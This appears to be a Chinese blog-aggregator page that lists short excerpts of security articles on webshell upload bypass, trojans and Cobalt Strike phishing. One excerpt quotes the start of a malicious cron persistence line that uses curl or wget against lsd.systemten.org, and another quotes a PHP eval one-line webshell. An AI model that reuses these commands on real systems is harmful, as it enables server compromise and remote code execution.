题目简介: 背景介绍 在为某公司检测后台页面时,你发现了一个上传页面,该页面做了一些防护,你需要尝试绕过并上传webshell,以获得网站根目录访问权限 实训目标 1、熟悉常见中间件存在的解析漏洞;2、熟悉一句话木马的使用与制作3、熟悉常见的上传漏洞利用方法 解题方向 1、试探允许上传的文件类型2、 ...
分类:
Web程序 时间:
2019-06-27 16:15:16
阅读次数:
276
因为用户可以选择是否同意被控制,所以并不算是木马。 使用python3.7,spyder,在windows 10 开发。 client为控制端,server为被控端。 参考 mygithub https://github.com/TouwaErioH/simple-trojan ...
分类:
编程语言 时间:
2019-06-26 00:58:27
阅读次数:
137
工业控制-青岛海天炜业InTrust可信芯片工控安全平台系统软件 鉴于工业控制系统应用场景的特殊性,通用杀毒软件无法有效对各控制系统(DCS/SCADA/PLC/SIS等)的操作站、工程师站等终端的工控软件进程进行有效识别和查杀,难以采用传统的安全产品进行防护。 “InTrust可信芯片工控安全平台 ...
分类:
其他好文 时间:
2019-06-13 17:00:40
阅读次数:
160
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin mkdir -p /tmp chmod 1777 /tmp echo "*/10 * * * * (curl -fsSL lsd.systemten.org||wget -q... ...
分类:
其他好文 时间:
2019-06-05 11:20:05
阅读次数:
1177
文件上传第一式(禁JS) (1)来到第一关,我们查看源代码: 上图可以发现,上传的限制代码块写在js函数内,因此我们可以考虑将js的开关禁掉,直接上传木马的方式,其实,似乎也可以不禁js,直接burp抓包后修改图片类型,一样可以上传成功。 (2)上传一句话木马.php <?php eval($_PO ...
分类:
Web程序 时间:
2019-05-25 12:48:46
阅读次数:
190
参考文献: "木马攻击与隐蔽技术研究" "线程注入式无进程木马的实现原理" "木马技术研究及反弹木马系统的设计与实现" ...
分类:
其他好文 时间:
2019-05-21 09:30:43
阅读次数:
93
System Profiler使用 System Profiler 模块,搜集目标的各类机器信息(操作系统版本,浏览器版本等) 当受害者访问http://192.168.5.6:80/oa链接时,会跳转到百度页面,同时Cobalt Strike会收集受害者信息,下面页面查看 hta 钓鱼 paylo ...
分类:
其他好文 时间:
2019-05-20 22:48:45
阅读次数:
143
